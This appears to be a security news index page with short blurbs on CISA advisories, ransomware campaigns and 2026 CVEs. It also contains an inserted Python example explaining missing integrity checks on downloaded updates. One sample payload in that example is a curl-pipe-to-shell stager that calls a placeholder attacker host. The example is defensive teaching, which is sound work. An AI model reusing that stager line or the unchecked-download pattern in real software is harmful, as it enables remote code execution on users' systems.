soc


CISA Shares Lessons Learned from an Incident Response Engagement

Advisory at a Glance Executive Summary CISA began incident response efforts at a U.S. federal civilian executive branch (FCEB) agency following the detection of potential malicious activity identified through security alerts generated by the agency’s endpoint detection and response (EDR) tool. CISA identified three lessons learned from the engagement that illuminate how to effectively mitigate […]

Read more →

Countering Chinese State-Sponsored Actors Compromise of Networks Worldwide to Feed Global Espionage System

Executive summary People’s Republic of China (PRC) state-sponsored cyber threat actors are targeting networks globally, including, but not limited to, telecommunications, government, transportation, lodging, and military infrastructure networks. While these actors focus on large backbone routers of major telecommunications providers, as well as provider edge (PE) and customer edge (CE) routers, they also leverage compromised […]

Read more →

Ransomware Actors Exploit Unpatched SimpleHelp Remote Monitoring and Management to Compromise Utility Billing Software Provider

Summary The Cybersecurity and Infrastructure Security Agency (CISA) is releasing this advisory in response to ransomware actors leveraging unpatched instances of a vulnerability in SimpleHelp Remote Monitoring and Management (RMM) to compromise customers of a utility billing software provider. This incident reflects a broader pattern of ransomware actors targeting organizations through unpatched versions of SimpleHelp […]

Read more →

Pro-Russia Hacktivists Conduct Opportunistic Attacks Against US and Global Critical Infrastructure

Summary Note: This joint Cybersecurity Advisory is being published as an addition to the Cybersecurity and Infrastructure Security Agency (CISA) May 6, 2025, joint fact sheet Primary Mitigations to Reduce Cyber Threats to Operational Technology and European Cybercrime Centre’s (EC3) Operation Eastwood, in which CISA, Federal Bureau of Investigation (FBI), Department of Energy (DOE), Environmental […]

Read more →

Progress ShareFile Flaws CVE-2026-2699 & CVE-2026-2701 RCE

A newly disclosed Progress ShareFile pre-auth RCE chain is drawing attention after researchers showed how CVE-2026-2699 and CVE-2026-2701 can be combined to compromise exposed Storage Zones Controller 5.x servers. The issue affects customer-managed ShareFile deployments that rely on the older 5.x branch, not every ShareFile environment. watchTowr publicly […]

Read more →

CVE-2026-20093: Critical Cisco IMC Flaw Allows Unauthenticated Admin Access to UCS Servers

CVE-2026-20093 is an authentication bypass flaw in the change-password functionality of Cisco Integrated Management Controller (IMC). It could allow an unauthenticated, remote attacker to bypass authentication mechanisms and gain unauthorized access to the system with Administrator privileges. What Is CVE-2026-20093? CVE-2026-20093 […]

Read more →

CVE-2026-5281: Chrome WebGPU Zero-Day Exploited In The Wild

Google patched CVE-2026-5281, a high-severity use-after-free (CWE-416) vulnerability in Dawn, Chromium’s WebGPU implementation. The company has confirmed exploitation in the wild, and CISA added it to the Known Exploited Vulnerabilities (KEV) catalog with a remediation deadline for federal agencies. This post breaks down what CVE-2026-5281 is, who […]

Read more →

BLACKNET-00: The Ransomware-as-a-Service Platform That Weaponizes Mediocrity

How a Custom Ransomware Builder Collapses the Technical Barrier Between Script Kiddies and Enterprise-Grade Ransomware Operations. Executive Summary: A threat actor named Infrastructure Destruction Squad announced BLACKNET-00 via Telegram, a fully GUI-driven ransomware builder that requires zero programming knowledge to operate. Featuring layered encryption (AES-256, RSA, ChaCha20), a […]

Read more →

CISA Adds One Known Exploited Vulnerability to Catalog

CISA has added one new vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation. CVE-2026-3502 TrueConf Client Download of Code Without Integrity Check Vulnerability. This type of vulnerability is a frequent attack vector for malicious cyber actors and poses significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited […]

Read more →
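The weakness class named in the KEV entry above, "Download of Code Without Integrity Check" (CWE-494), is easy to get wrong even when a developer thinks a check is in place. The following is an added illustration, not code from the TrueConf client or from CISA; the update payloads, the pinned digest and the attacker-controlled response are all constructed for this example. It contrasts three update-client patterns: no check at all, a digest that travels with the download (which an attacker on the path can simply recompute), and a digest anchored in a value the download channel cannot influence.

```python
import hashlib
import hmac
from typing import Optional

# Constructed sample "update packages" (not real vendor artifacts). The client
# fetches one of these from an update server, possibly through a MITM or a
# compromised mirror.
GENUINE_PAYLOAD = b"print('legitimate client update')\n"
MALICIOUS_PAYLOAD = b"import os; os.system('curl http://attacker.invalid/s | sh')\n"  # hypothetical stager


def sha256_hex(data: bytes) -> str:
    """Hex SHA-256 of the downloaded bytes."""
    return hashlib.sha256(data).hexdigest()


# Assumption for this example: the vendor published this digest out of band
# (pinned in the installer, or fetched over a separately authenticated channel),
# so a network attacker cannot substitute it along with the payload.
PINNED_DIGEST = sha256_hex(GENUINE_PAYLOAD)


def attacker_response(payload: bytes) -> dict:
    """What an on-path attacker returns: a payload of its choice plus a digest
    it computed itself, so any 'inline' digest comparison will pass."""
    return {"payload": payload, "sha256": sha256_hex(payload)}


def install_without_check(response: dict) -> bytes:
    """CWE-494 as commonly seen: whatever the server returned is installed/run."""
    return response["payload"]


def install_with_inline_digest(response: dict) -> Optional[bytes]:
    """Still CWE-494: the digest arrived with the download, so the attacker
    controls both sides of the comparison. Returns None only on a transport
    corruption, never on a deliberate substitution."""
    if not hmac.compare_digest(sha256_hex(response["payload"]), response["sha256"]):
        return None
    return response["payload"]


def install_with_pinned_digest(response: dict, pinned: str = PINNED_DIGEST) -> Optional[bytes]:
    """Integrity check anchored in a trusted value: the download is accepted
    only if it hashes to the digest the client already trusted before the
    download started. compare_digest avoids a timing side channel on the
    comparison itself."""
    if not hmac.compare_digest(sha256_hex(response["payload"]), pinned):
        return None
    return response["payload"]


if __name__ == "__main__":
    mitm = attacker_response(MALICIOUS_PAYLOAD)
    print("no check      ->", install_without_check(mitm) == MALICIOUS_PAYLOAD)      # True: compromised
    print("inline digest ->", install_with_inline_digest(mitm) == MALICIOUS_PAYLOAD) # True: compromised
    print("pinned digest ->", install_with_pinned_digest(mitm))                      # None: rejected
```

A pinned digest only fits a single fixed release, so production updaters verify a signature over the package (or over a manifest of digests) with a public key shipped in the client instead; the property that matters is the same one this example isolates, namely that the value the check trusts must not be obtainable from the same channel the attacker can tamper with.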

Trivy-Linked Cisco Breach & ShinyHunters’ Stolen Data Claim

Cisco is facing fresh scrutiny after a breach of its internal development environment was linked to the Trivy supply chain compromise. A ShinyHunters extortion claim has since surfaced, alleging theft of Salesforce data, GitHub repositories, and AWS assets. This post outlines what is currently known, what remains unverified, and where the […]

Read more →